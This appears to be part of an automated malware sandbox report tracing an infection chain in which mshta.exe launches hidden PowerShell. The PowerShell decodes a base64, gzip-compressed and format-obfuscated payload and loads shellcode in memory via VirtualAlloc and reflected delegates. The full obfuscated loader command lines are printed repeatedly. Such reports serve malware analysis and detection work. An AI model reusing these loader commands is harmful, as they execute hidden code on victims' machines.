          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

          Data Obfuscation

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String(((''H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((nkQ kernel32.dll VirtualAlloc), (k6 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $jR5wG.Length,0x3000, 0x04)[System.Runtime.InteropServi
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('M
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpT
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+